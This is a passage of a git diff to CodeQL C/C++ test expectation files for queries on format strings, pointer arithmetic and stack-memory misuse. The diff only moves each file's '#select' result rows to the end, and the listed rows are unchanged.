test.cpp:87:25:87:26 | d2 | test.cpp:31:2:31:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:87:25:87:26 | d2 | this cast | +| test.cpp:35:2:35:2 | b | test.cpp:59:21:59:21 | d | test.cpp:35:2:35:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:59:21:59:21 | d | this cast | +| test.cpp:35:2:35:2 | b | test.cpp:76:21:76:23 | dss | test.cpp:35:2:35:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:76:21:76:23 | dss | this cast | +| test.cpp:35:2:35:2 | b | test.cpp:88:21:88:22 | d2 | test.cpp:35:2:35:2 | b | This pointer arithmetic may be done with the wrong type because of $@. | test.cpp:88:21:88:22 | d2 | this cast | diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.expected b/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.expected index 20ac0f055a1b..63851030bba5 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.expected +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/NonConstantFormat/NonConstantFormat.expected @@ -1,23 +1,3 @@ -#select -| NonConstantFormat.c:30:10:30:16 | *access to array | NonConstantFormat.c:28:27:28:30 | **argv | NonConstantFormat.c:30:10:30:16 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | NonConstantFormat.c:30:3:30:8 | call to printf | printf | -| NonConstantFormat.c:41:9:41:45 | *call to any_random_function | NonConstantFormat.c:41:9:41:45 | *call to any_random_function | NonConstantFormat.c:41:9:41:45 | *call to any_random_function | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | NonConstantFormat.c:41:2:41:7 | call to printf | printf | -| NonConstantFormat.c:45:9:45:48 | *call to gettext | NonConstantFormat.c:45:11:45:47 | *call to any_random_function | NonConstantFormat.c:45:9:45:48 | *call to gettext | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | NonConstantFormat.c:45:2:45:7 | call to printf | printf | -| nested.cpp:21:23:21:26 | *fmt0 | nested.cpp:42:24:42:34 | *call to ext_fmt_str | nested.cpp:21:23:21:26 | *fmt0 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | nested.cpp:21:5:21:12 | call to snprintf | snprintf | -| nested.cpp:79:32:79:38 | *call to get_fmt | nested.cpp:79:32:79:38 | *call to get_fmt | nested.cpp:79:32:79:38 | *call to get_fmt | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | nested.cpp:79:5:79:14 | call to diagnostic | diagnostic | -| nested.cpp:87:18:87:20 | *fmt | nested.cpp:86:19:86:46 | *call to __builtin_alloca | nested.cpp:87:18:87:20 | *fmt | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | nested.cpp:87:7:87:16 | call to diagnostic | diagnostic | -| test.cpp:130:20:130:26 | *access to array | test.cpp:46:27:46:30 | **argv | test.cpp:130:20:130:26 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:130:2:130:10 | call to sprintf | sprintf | -| test.cpp:170:12:170:14 | *res | test.cpp:167:31:167:34 | *data | test.cpp:170:12:170:14 | *res | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:170:5:170:10 | call to printf | printf | -| test.cpp:195:31:195:33 | *str | test.cpp:193:32:193:34 | *str | test.cpp:195:31:195:33 | *str | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:195:3:195:18 | call to StringCchPrintfW | StringCchPrintfW | -| test.cpp:197:11:197:14 | *wstr | test.cpp:193:32:193:34 | *str | test.cpp:197:11:197:14 | *wstr | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:197:3:197:9 | call to wprintf | wprintf | -| test.cpp:205:12:205:20 | *... + ... | test.cpp:204:25:204:36 | *call to get_string | test.cpp:205:12:205:20 | *... + ... | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:205:5:205:10 | call to printf | printf | -| test.cpp:206:12:206:16 | *hello | test.cpp:204:25:204:36 | *call to get_string | test.cpp:206:12:206:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:206:5:206:10 | call to printf | printf | -| test.cpp:211:12:211:16 | *hello | test.cpp:209:25:209:36 | *call to get_string | test.cpp:211:12:211:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:211:5:211:10 | call to printf | printf | -| test.cpp:217:12:217:16 | *hello | test.cpp:215:25:215:36 | *call to get_string | test.cpp:217:12:217:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:217:5:217:10 | call to printf | printf | -| test.cpp:223:12:223:16 | *hello | test.cpp:221:25:221:36 | *call to get_string | test.cpp:223:12:223:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:223:5:223:10 | call to printf | printf | -| test.cpp:228:12:228:18 | *++ ... | test.cpp:227:25:227:36 | *call to get_string | test.cpp:228:12:228:18 | *++ ... | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:228:5:228:10 | call to printf | printf | -| test.cpp:235:12:235:16 | *hello | test.cpp:232:25:232:36 | *call to get_string | test.cpp:235:12:235:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:235:5:235:10 | call to printf | printf | -| test.cpp:242:12:242:16 | *hello | test.cpp:239:25:239:36 | *call to get_string | test.cpp:242:12:242:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:242:5:242:10 | call to printf | printf | -| test.cpp:247:12:247:16 | *hello | test.cpp:245:25:245:36 | *call to get_string | test.cpp:247:12:247:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:247:5:247:10 | call to printf | printf | edges | NonConstantFormat.c:28:27:28:30 | **argv | NonConstantFormat.c:30:10:30:16 | *access to array | provenance | | | NonConstantFormat.c:45:11:45:47 | *call to any_random_function | NonConstantFormat.c:45:9:45:48 | *call to gettext | provenance | DataFlowFunction | @@ -118,3 +98,23 @@ nodes | test.cpp:247:12:247:16 | *hello | semmle.label | *hello | subpaths | test.cpp:195:31:195:33 | *str | test.cpp:179:6:179:21 | [summary param] *2 in StringCchPrintfW | test.cpp:179:6:179:21 | [summary param] *0 in StringCchPrintfW [Return] | test.cpp:195:20:195:23 | StringCchPrintfW output argument | +#select +| NonConstantFormat.c:30:10:30:16 | *access to array | NonConstantFormat.c:28:27:28:30 | **argv | NonConstantFormat.c:30:10:30:16 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | NonConstantFormat.c:30:3:30:8 | call to printf | printf | +| NonConstantFormat.c:41:9:41:45 | *call to any_random_function | NonConstantFormat.c:41:9:41:45 | *call to any_random_function | NonConstantFormat.c:41:9:41:45 | *call to any_random_function | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | NonConstantFormat.c:41:2:41:7 | call to printf | printf | +| NonConstantFormat.c:45:9:45:48 | *call to gettext | NonConstantFormat.c:45:11:45:47 | *call to any_random_function | NonConstantFormat.c:45:9:45:48 | *call to gettext | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | NonConstantFormat.c:45:2:45:7 | call to printf | printf | +| nested.cpp:21:23:21:26 | *fmt0 | nested.cpp:42:24:42:34 | *call to ext_fmt_str | nested.cpp:21:23:21:26 | *fmt0 | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | nested.cpp:21:5:21:12 | call to snprintf | snprintf | +| nested.cpp:79:32:79:38 | *call to get_fmt | nested.cpp:79:32:79:38 | *call to get_fmt | nested.cpp:79:32:79:38 | *call to get_fmt | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | nested.cpp:79:5:79:14 | call to diagnostic | diagnostic | +| nested.cpp:87:18:87:20 | *fmt | nested.cpp:86:19:86:46 | *call to __builtin_alloca | nested.cpp:87:18:87:20 | *fmt | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | nested.cpp:87:7:87:16 | call to diagnostic | diagnostic | +| test.cpp:130:20:130:26 | *access to array | test.cpp:46:27:46:30 | **argv | test.cpp:130:20:130:26 | *access to array | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:130:2:130:10 | call to sprintf | sprintf | +| test.cpp:170:12:170:14 | *res | test.cpp:167:31:167:34 | *data | test.cpp:170:12:170:14 | *res | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:170:5:170:10 | call to printf | printf | +| test.cpp:195:31:195:33 | *str | test.cpp:193:32:193:34 | *str | test.cpp:195:31:195:33 | *str | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:195:3:195:18 | call to StringCchPrintfW | StringCchPrintfW | +| test.cpp:197:11:197:14 | *wstr | test.cpp:193:32:193:34 | *str | test.cpp:197:11:197:14 | *wstr | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:197:3:197:9 | call to wprintf | wprintf | +| test.cpp:205:12:205:20 | *... + ... | test.cpp:204:25:204:36 | *call to get_string | test.cpp:205:12:205:20 | *... + ... | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:205:5:205:10 | call to printf | printf | +| test.cpp:206:12:206:16 | *hello | test.cpp:204:25:204:36 | *call to get_string | test.cpp:206:12:206:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:206:5:206:10 | call to printf | printf | +| test.cpp:211:12:211:16 | *hello | test.cpp:209:25:209:36 | *call to get_string | test.cpp:211:12:211:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:211:5:211:10 | call to printf | printf | +| test.cpp:217:12:217:16 | *hello | test.cpp:215:25:215:36 | *call to get_string | test.cpp:217:12:217:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:217:5:217:10 | call to printf | printf | +| test.cpp:223:12:223:16 | *hello | test.cpp:221:25:221:36 | *call to get_string | test.cpp:223:12:223:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:223:5:223:10 | call to printf | printf | +| test.cpp:228:12:228:18 | *++ ... | test.cpp:227:25:227:36 | *call to get_string | test.cpp:228:12:228:18 | *++ ... | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:228:5:228:10 | call to printf | printf | +| test.cpp:235:12:235:16 | *hello | test.cpp:232:25:232:36 | *call to get_string | test.cpp:235:12:235:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:235:5:235:10 | call to printf | printf | +| test.cpp:242:12:242:16 | *hello | test.cpp:239:25:239:36 | *call to get_string | test.cpp:242:12:242:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:242:5:242:10 | call to printf | printf | +| test.cpp:247:12:247:16 | *hello | test.cpp:245:25:245:36 | *call to get_string | test.cpp:247:12:247:16 | *hello | The format string argument to $@ has a source which cannot be verified to originate from a string literal. | test.cpp:247:5:247:10 | call to printf | printf | diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/ReturnStackAllocatedMemory.expected b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/ReturnStackAllocatedMemory.expected index f53047761409..6aa457b1e8a4 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/ReturnStackAllocatedMemory.expected +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/ReturnStackAllocatedMemory/ReturnStackAllocatedMemory.expected @@ -1,20 +1,3 @@ -#select -| test.cpp:17:9:17:11 | CopyValue: & ... | test.cpp:17:10:17:11 | mc | test.cpp:17:9:17:11 | & ... | May return stack-allocated memory from $@. | test.cpp:17:10:17:11 | mc | mc | -| test.cpp:25:9:25:11 | Load: ptr | test.cpp:23:18:23:19 | mc | test.cpp:25:9:25:11 | ptr | May return stack-allocated memory from $@. | test.cpp:23:18:23:19 | mc | mc | -| test.cpp:41:9:41:12 | CopyValue: & ... | test.cpp:39:17:39:18 | mc | test.cpp:41:9:41:12 | & ... | May return stack-allocated memory from $@. | test.cpp:39:17:39:18 | mc | mc | -| test.cpp:47:9:47:10 | CopyValue: (reference to) | test.cpp:47:9:47:10 | mc | test.cpp:47:9:47:10 | (reference to) | May return stack-allocated memory from $@. | test.cpp:47:9:47:10 | mc | mc | -| test.cpp:54:9:54:15 | CopyValue: & ... | test.cpp:54:11:54:12 | mc | test.cpp:54:9:54:15 | & ... | May return stack-allocated memory from $@. | test.cpp:54:11:54:12 | mc | mc | -| test.cpp:92:9:92:11 | Load: ptr | test.cpp:89:10:89:11 | mc | test.cpp:92:9:92:11 | ptr | May return stack-allocated memory from $@. | test.cpp:89:10:89:11 | mc | mc | -| test.cpp:112:9:112:11 | Convert: array to pointer conversion | test.cpp:112:9:112:11 | arr | test.cpp:112:9:112:11 | array to pointer conversion | May return stack-allocated memory from $@. | test.cpp:112:9:112:11 | arr | arr | -| test.cpp:119:9:119:18 | CopyValue: & ... | test.cpp:119:11:119:13 | arr | test.cpp:119:9:119:18 | & ... | May return stack-allocated memory from $@. | test.cpp:119:11:119:13 | arr | arr | -| test.cpp:137:9:137:11 | Load: ptr | test.cpp:134:8:134:10 | arr | test.cpp:137:9:137:11 | ptr | May return stack-allocated memory from $@. | test.cpp:134:8:134:10 | arr | arr | -| test.cpp:171:10:171:23 | Load: pointerToLocal | test.cpp:170:35:170:41 | myLocal | test.cpp:171:10:171:23 | pointerToLocal | May return stack-allocated memory from $@. | test.cpp:170:35:170:41 | myLocal | myLocal | -| test.cpp:177:10:177:23 | Convert: (void *)... | test.cpp:176:25:176:34 | localArray | test.cpp:177:10:177:23 | (void *)... | May return stack-allocated memory from $@. | test.cpp:176:25:176:34 | localArray | localArray | -| test.cpp:183:10:183:19 | CopyValue: (reference to) | test.cpp:182:21:182:27 | myLocal | test.cpp:183:10:183:19 | (reference to) | May return stack-allocated memory from $@. | test.cpp:182:21:182:27 | myLocal | myLocal | -| test.cpp:190:10:190:13 | CopyValue: (reference to) | test.cpp:189:16:189:16 | p | test.cpp:190:10:190:13 | (reference to) | May return stack-allocated memory from $@. | test.cpp:189:16:189:16 | p | p | -| test.cpp:238:9:238:9 | Load: p | test.cpp:237:12:237:17 | call to alloca | test.cpp:238:9:238:9 | p | May return stack-allocated memory from $@. | test.cpp:237:12:237:17 | call to alloca | call to alloca | -| test.cpp:245:9:245:15 | Call: call to strdupa | test.cpp:245:9:245:15 | call to strdupa | test.cpp:245:9:245:15 | call to strdupa | May return stack-allocated memory from $@. | test.cpp:245:9:245:15 | call to strdupa | call to strdupa | -| test.cpp:250:9:250:10 | Convert: (void *)... | test.cpp:249:13:249:20 | call to strndupa | test.cpp:250:9:250:10 | (void *)... | May return stack-allocated memory from $@. | test.cpp:249:13:249:20 | call to strndupa | call to strndupa | edges | test.cpp:17:10:17:11 | mc | test.cpp:17:9:17:11 | & ... | | test.cpp:23:17:23:19 | & ... | test.cpp:23:17:23:19 | & ... | @@ -131,3 +114,20 @@ nodes | test.cpp:249:13:249:20 | call to strndupa | semmle.label | call to strndupa | | test.cpp:250:9:250:10 | (void *)... | semmle.label | (void *)... | | test.cpp:250:9:250:10 | s2 | semmle.label | s2 | +#select +| test.cpp:17:9:17:11 | CopyValue: & ... | test.cpp:17:10:17:11 | mc | test.cpp:17:9:17:11 | & ... | May return stack-allocated memory from $@. | test.cpp:17:10:17:11 | mc | mc | +| test.cpp:25:9:25:11 | Load: ptr | test.cpp:23:18:23:19 | mc | test.cpp:25:9:25:11 | ptr | May return stack-allocated memory from $@. | test.cpp:23:18:23:19 | mc | mc | +| test.cpp:41:9:41:12 | CopyValue: & ... | test.cpp:39:17:39:18 | mc | test.cpp:41:9:41:12 | & ... | May return stack-allocated memory from $@. | test.cpp:39:17:39:18 | mc | mc | +| test.cpp:47:9:47:10 | CopyValue: (reference to) | test.cpp:47:9:47:10 | mc | test.cpp:47:9:47:10 | (reference to) | May return stack-allocated memory from $@. | test.cpp:47:9:47:10 | mc | mc | +| test.cpp:54:9:54:15 | CopyValue: & ... | test.cpp:54:11:54:12 | mc | test.cpp:54:9:54:15 | & ... | May return stack-allocated memory from $@. | test.cpp:54:11:54:12 | mc | mc | +| test.cpp:92:9:92:11 | Load: ptr | test.cpp:89:10:89:11 | mc | test.cpp:92:9:92:11 | ptr | May return stack-allocated memory from $@. | test.cpp:89:10:89:11 | mc | mc | +| test.cpp:112:9:112:11 | Convert: array to pointer conversion | test.cpp:112:9:112:11 | arr | test.cpp:112:9:112:11 | array to pointer conversion | May return stack-allocated memory from $@. | test.cpp:112:9:112:11 | arr | arr | +| test.cpp:119:9:119:18 | CopyValue: & ... | test.cpp:119:11:119:13 | arr | test.cpp:119:9:119:18 | & ... | May return stack-allocated memory from $@. | test.cpp:119:11:119:13 | arr | arr | +| test.cpp:137:9:137:11 | Load: ptr | test.cpp:134:8:134:10 | arr | test.cpp:137:9:137:11 | ptr | May return stack-allocated memory from $@. | test.cpp:134:8:134:10 | arr | arr | +| test.cpp:171:10:171:23 | Load: pointerToLocal | test.cpp:170:35:170:41 | myLocal | test.cpp:171:10:171:23 | pointerToLocal | May return stack-allocated memory from $@. | test.cpp:170:35:170:41 | myLocal | myLocal | +| test.cpp:177:10:177:23 | Convert: (void *)... | test.cpp:176:25:176:34 | localArray | test.cpp:177:10:177:23 | (void *)... | May return stack-allocated memory from $@. | test.cpp:176:25:176:34 | localArray | localArray | +| test.cpp:183:10:183:19 | CopyValue: (reference to) | test.cpp:182:21:182:27 | myLocal | test.cpp:183:10:183:19 | (reference to) | May return stack-allocated memory from $@. | test.cpp:182:21:182:27 | myLocal | myLocal | +| test.cpp:190:10:190:13 | CopyValue: (reference to) | test.cpp:189:16:189:16 | p | test.cpp:190:10:190:13 | (reference to) | May return stack-allocated memory from $@. | test.cpp:189:16:189:16 | p | p | +| test.cpp:238:9:238:9 | Load: p | test.cpp:237:12:237:17 | call to alloca | test.cpp:238:9:238:9 | p | May return stack-allocated memory from $@. | test.cpp:237:12:237:17 | call to alloca | call to alloca | +| test.cpp:245:9:245:15 | Call: call to strdupa | test.cpp:245:9:245:15 | call to strdupa | test.cpp:245:9:245:15 | call to strdupa | May return stack-allocated memory from $@. | test.cpp:245:9:245:15 | call to strdupa | call to strdupa | +| test.cpp:250:9:250:10 | Convert: (void *)... | test.cpp:249:13:249:20 | call to strndupa | test.cpp:250:9:250:10 | (void *)... | May return stack-allocated memory from $@. | test.cpp:249:13:249:20 | call to strndupa | call to strndupa | diff --git a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/UsingExpiredStackAddress.expected b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/UsingExpiredStackAddress.expected index bf50722ec86b..858dbea59321 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/UsingExpiredStackAddress.expected +++ b/cpp/ql/test/query-tests/Likely Bugs/Memory Management/UsingExpiredStackAddress/UsingExpiredStackAddress.expected @@ -1,31 +1,3 @@ -#select -| test.cpp:15:16:15:16 | Load: p | test.cpp:10:3:10:13 | Store: ... = ... | test.cpp:15:16:15:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:9:7:9:7 | x | x | test.cpp:10:3:10:13 | Store: ... = ... | this store | -| test.cpp:24:16:24:16 | Load: p | test.cpp:10:3:10:13 | Store: ... = ... | test.cpp:24:16:24:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:9:7:9:7 | x | x | test.cpp:10:3:10:13 | Store: ... = ... | this store | -| test.cpp:58:16:58:16 | Load: p | test.cpp:52:3:52:13 | Store: ... = ... | test.cpp:58:16:58:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:51:36:51:36 | y | y | test.cpp:52:3:52:13 | Store: ... = ... | this store | -| test.cpp:73:16:73:16 | Load: p | test.cpp:68:3:68:13 | Store: ... = ... | test.cpp:73:16:73:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:62:7:62:7 | x | x | test.cpp:68:3:68:13 | Store: ... = ... | this store | -| test.cpp:98:15:98:15 | Load: p | test.cpp:93:3:93:15 | Store: ... = ... | test.cpp:98:15:98:15 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:92:8:92:8 | s | s | test.cpp:93:3:93:15 | Store: ... = ... | this store | -| test.cpp:111:16:111:16 | Load: p | test.cpp:106:3:106:14 | Store: ... = ... | test.cpp:111:16:111:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:102:7:102:7 | x | x | test.cpp:106:3:106:14 | Store: ... = ... | this store | -| test.cpp:161:16:161:17 | Load: p1 | test.cpp:136:3:136:12 | Store: ... = ... | test.cpp:161:16:161:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:136:3:136:12 | Store: ... = ... | this store | -| test.cpp:162:16:162:17 | Load: p1 | test.cpp:137:3:137:16 | Store: ... = ... | test.cpp:162:16:162:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:137:3:137:16 | Store: ... = ... | this store | -| test.cpp:164:16:164:17 | Load: p2 | test.cpp:139:3:139:12 | Store: ... = ... | test.cpp:164:16:164:17 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:139:3:139:12 | Store: ... = ... | this store | -| test.cpp:165:16:165:17 | Load: p2 | test.cpp:139:3:139:12 | Store: ... = ... | test.cpp:165:16:165:17 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:139:3:139:12 | Store: ... = ... | this store | -| test.cpp:166:17:166:18 | Load: p2 | test.cpp:140:3:140:16 | Store: ... = ... | test.cpp:166:17:166:18 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:140:3:140:16 | Store: ... = ... | this store | -| test.cpp:167:16:167:17 | Load: p1 | test.cpp:141:3:141:15 | Store: ... = ... | test.cpp:167:16:167:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:141:3:141:15 | Store: ... = ... | this store | -| test.cpp:168:17:168:18 | Load: p1 | test.cpp:142:3:142:19 | Store: ... = ... | test.cpp:168:17:168:18 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:142:3:142:19 | Store: ... = ... | this store | -| test.cpp:170:16:170:17 | Load: p3 | test.cpp:144:3:144:12 | Store: ... = ... | test.cpp:170:16:170:17 | Load: p3 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:144:3:144:12 | Store: ... = ... | this store | -| test.cpp:171:17:171:18 | Load: p3 | test.cpp:145:3:145:16 | Store: ... = ... | test.cpp:171:17:171:18 | Load: p3 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:145:3:145:16 | Store: ... = ... | this store | -| test.cpp:172:18:172:19 | Load: p2 | test.cpp:146:3:146:15 | Store: ... = ... | test.cpp:172:18:172:19 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:146:3:146:15 | Store: ... = ... | this store | -| test.cpp:173:18:173:19 | Load: p2 | test.cpp:147:3:147:19 | Store: ... = ... | test.cpp:173:18:173:19 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:147:3:147:19 | Store: ... = ... | this store | -| test.cpp:174:18:174:19 | Load: p1 | test.cpp:142:3:142:19 | Store: ... = ... | test.cpp:174:18:174:19 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:142:3:142:19 | Store: ... = ... | this store | -| test.cpp:175:16:175:17 | Load: p1 | test.cpp:148:3:148:18 | Store: ... = ... | test.cpp:175:16:175:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:148:3:148:18 | Store: ... = ... | this store | -| test.cpp:177:14:177:21 | Load: access to array | test.cpp:151:3:151:15 | Store: ... = ... | test.cpp:177:14:177:21 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:151:3:151:15 | Store: ... = ... | this store | -| test.cpp:178:14:178:21 | Load: access to array | test.cpp:152:3:152:19 | Store: ... = ... | test.cpp:178:14:178:21 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:152:3:152:19 | Store: ... = ... | this store | -| test.cpp:179:14:179:21 | Load: access to array | test.cpp:153:3:153:18 | Store: ... = ... | test.cpp:179:14:179:21 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:153:3:153:18 | Store: ... = ... | this store | -| test.cpp:180:14:180:19 | Load: * ... | test.cpp:154:3:154:22 | Store: ... = ... | test.cpp:180:14:180:19 | Load: * ... | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 | b2 | test.cpp:154:3:154:22 | Store: ... = ... | this store | -| test.cpp:181:13:181:20 | Load: access to array | test.cpp:155:3:155:21 | Store: ... = ... | test.cpp:181:13:181:20 | Load: access to array | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:155:3:155:21 | Store: ... = ... | this store | -| test.cpp:182:14:182:19 | Load: * ... | test.cpp:156:3:156:25 | Store: ... = ... | test.cpp:182:14:182:19 | Load: * ... | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:134:7:134:8 | b3 | b3 | test.cpp:156:3:156:25 | Store: ... = ... | this store | -| test.cpp:239:17:239:17 | Load: p | test.cpp:234:3:234:13 | Store: ... = ... | test.cpp:239:17:239:17 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:232:7:232:7 | x | x | test.cpp:234:3:234:13 | Store: ... = ... | this store | -| test.cpp:268:17:268:17 | Load: p | test.cpp:263:3:263:13 | Store: ... = ... | test.cpp:268:17:268:17 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:260:7:260:7 | x | x | test.cpp:263:3:263:13 | Store: ... = ... | this store | edges | test.cpp:10:3:10:13 | Store: ... = ... | test.cpp:14:3:14:9 | Call: call to escape1 | | test.cpp:10:3:10:13 | Store: ... = ... | test.cpp:19:3:19:9 | Call: call to escape1 | @@ -96,3 +68,31 @@ edges | test.cpp:238:3:238:9 | Call: call to escape2 | test.cpp:239:17:239:17 | Load: p | | test.cpp:263:3:263:13 | Store: ... = ... | test.cpp:267:3:267:9 | Call: call to escape3 | | test.cpp:267:3:267:9 | Call: call to escape3 | test.cpp:268:17:268:17 | Load: p | +#select +| test.cpp:15:16:15:16 | Load: p | test.cpp:10:3:10:13 | Store: ... = ... | test.cpp:15:16:15:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:9:7:9:7 | x | x | test.cpp:10:3:10:13 | Store: ... = ... | this store | +| test.cpp:24:16:24:16 | Load: p | test.cpp:10:3:10:13 | Store: ... = ... | test.cpp:24:16:24:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:9:7:9:7 | x | x | test.cpp:10:3:10:13 | Store: ... = ... | this store | +| test.cpp:58:16:58:16 | Load: p | test.cpp:52:3:52:13 | Store: ... = ... | test.cpp:58:16:58:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:51:36:51:36 | y | y | test.cpp:52:3:52:13 | Store: ... = ... | this store | +| test.cpp:73:16:73:16 | Load: p | test.cpp:68:3:68:13 | Store: ... = ... | test.cpp:73:16:73:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:62:7:62:7 | x | x | test.cpp:68:3:68:13 | Store: ... = ... | this store | +| test.cpp:98:15:98:15 | Load: p | test.cpp:93:3:93:15 | Store: ... = ... | test.cpp:98:15:98:15 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:92:8:92:8 | s | s | test.cpp:93:3:93:15 | Store: ... = ... | this store | +| test.cpp:111:16:111:16 | Load: p | test.cpp:106:3:106:14 | Store: ... = ... | test.cpp:111:16:111:16 | Load: p | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:102:7:102:7 | x | x | test.cpp:106:3:106:14 | Store: ... = ... | this store | +| test.cpp:161:16:161:17 | Load: p1 | test.cpp:136:3:136:12 | Store: ... = ... | test.cpp:161:16:161:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:136:3:136:12 | Store: ... = ... | this store | +| test.cpp:162:16:162:17 | Load: p1 | test.cpp:137:3:137:16 | Store: ... = ... | test.cpp:162:16:162:17 | Load: p1 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:132:7:132:8 | b1 | b1 | test.cpp:137:3:137:16 | Store: ... = ... | this store | +| test.cpp:164:16:164:17 | Load: p2 | test.cpp:139:3:139:12 | Store: ... = ... | test.cpp:164:16:164:17 | Load: p2 | Stack variable $@ escapes at $@ and is used after it has expired. | test.cpp:133:7:133:8 | b2 